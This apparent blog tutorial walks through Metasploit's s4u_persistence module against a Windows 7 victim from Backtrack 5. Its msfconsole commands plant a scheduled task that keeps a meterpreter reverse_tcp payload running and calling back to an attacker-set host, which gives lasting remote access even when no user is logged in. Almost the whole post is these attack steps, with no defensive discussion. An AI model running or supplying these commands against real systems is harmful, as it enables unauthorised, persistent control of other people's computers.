Windows Manage User Level Persistent Payload Installer

Creates a scheduled task that will run using service-for-user (S4U). This allows the scheduled task to run even as an unprivileged user that is not logged into the device. This will result in lower security context, allowing access to local resources only. The module requires 'Logon as a batch job' permissions (SeBatchLogonRight)

Exploit Targets
Windows PC

Attacker: Backtrack 5
Victim PC: Windows 7

Open backtrack terminal type msfconsole

Now type use exploit/windows/local/s4u_persistence
msf exploit (s4u_persistence)>set payload windows/meterpreter/reverse_tcp
msf exploit (s4u_persistence)>set lhost (IP of Local Host)
msf exploit (s4u_persistence)>set session 1 
msf exploit (s4u_persistence)>exploit


Post a Comment